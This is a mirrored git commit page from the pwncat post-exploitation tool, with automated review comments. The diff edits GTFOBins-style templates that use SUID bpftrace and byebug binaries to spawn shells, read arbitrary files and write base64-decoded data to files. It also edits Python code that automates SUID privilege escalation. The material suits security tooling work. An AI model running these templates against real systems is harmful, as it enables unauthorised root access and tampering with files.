mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 09:35:39 +01:00

Merge branch 'master' of github.com:calebstewart/pwncat

Caleb Stewart 2020-05-09 22:08:08 -04:00
commit 7eff74efd5
4 changed files with 14 additions and 5 deletions

1
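--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,4 @@ env/
 **/*.egg-info/
 build/
 dist/
+.byebug_history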


@ -85,7 +85,7 @@
{ {
"name": "bpftrace", "name": "bpftrace",
"shell": { "shell": {
"script": "{command} -c {shell} -e 'END {{{{exit()}}}}'", "script": "{command} -c {shell} -e 'END {{exit()}}'",
"suid": ["-p"] "suid": ["-p"]
} }
}, },
@ -119,13 +119,16 @@
{ {
"name": "byebug", "name": "byebug",
"shell": { "shell": {
"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} $TF", "script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} --no-stop -q $TF",
"input": "continue\n" "need": [
"--no-stop",
"-q"
]
}, },
"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} $TF", "read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} --no-stop -q $TF",
"write_file": { "write_file": {
"type": "base64", "type": "base64",
"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{command} $TF" "payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
} }
}, },
{ {
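Review bot: In the byebug entry the new `write_file` payload ends in `{path} --no-stop -q $TF`, while the `shell` script and `read_file` of the same entry end in `{command} --no-stop -q $TF`. If `{command}` is the placeholder that carries the binary path together with any extra arguments (not visible here), the three strings should use the same placeholder. The new `"need": ["--no-stop", "-q"]` list also repeats flags that the `script` string now hard-codes, so depending on how `need` is expanded the flags may be passed twice. Keeping them in one place would avoid that.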


@ -67,6 +67,7 @@ class SetuidMethod(Method):
# Update the cache for the current user # Update the cache for the current user
self.find_suid() self.find_suid()
known_techniques = []
for user, paths in self.suid_paths.items(): for user, paths in self.suid_paths.items():
for path in paths: for path in paths:
binary = gtfobins.Binary.find(path) binary = gtfobins.Binary.find(path)
@ -95,6 +96,7 @@ class SetuidMethod(Method):
# Run the start commands # Run the start commands
self.pty.run(enter + "\n", wait=False) self.pty.run(enter + "\n", wait=False)
# self.pty.process(enter, delim=False)
# Send required input # Send required input
self.pty.client.send(input.encode("utf-8")) self.pty.client.send(input.encode("utf-8"))
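Review bot: The line added in the second hunk, `# self.pty.process(enter, delim=False)`, is commented-out code with no explanation after the `self.pty.run(enter + "\n", wait=False)` call. Either delete it or replace it with a why-comment stating why `run()` is used instead of `process()` here. The other addition, `known_techniques = []` ahead of the `for user, paths in self.suid_paths.items():` loop, is not read in any visible line, so confirm it is consumed further down and not left over from the merge. Both hunks cut through methods of `SetuidMethod` whose start and end are outside the view.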


@ -799,6 +799,8 @@ class PtyHandler:
response = self.recvuntil(b"_PWNCAT_ENDDELIM_") response = self.recvuntil(b"_PWNCAT_ENDDELIM_")
response = response.split(b"_PWNCAT_ENDDELIM_")[0] response = response.split(b"_PWNCAT_ENDDELIM_")[0]
if b"_PWNCAT_STARTDELIM_" in response:
response = b"\n".join(response.split(b"\n")[1:])
if self.has_cr: if self.has_cr:
self.recvuntil(b"\r\n") self.recvuntil(b"\r\n")
@ -985,6 +987,7 @@ class PtyHandler:
if line == "": if line == "":
continue continue
line = line.strip().split(":") line = line.strip().split(":")
user_data = { user_data = {
"name": line[0], "name": line[0],
"password": None, "password": None,
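Review bot: In the first hunk the new check `if b"_PWNCAT_STARTDELIM_" in response:` tests the whole buffer but then always discards the first line. A start delimiter on any later line, or inside the command's own output, would therefore remove a line of real output. Scoping the test to the line being dropped is safer: `first, _, rest = response.partition(b"\n")` followed by `if b"_PWNCAT_STARTDELIM_" in first: response = rest`. A one-line comment saying this strips the echoed command line would also help, if that is the intent (inferred from the delimiter names). The enclosing `PtyHandler` method begins and ends outside the hunk, and the second hunk appears to add only a blank line.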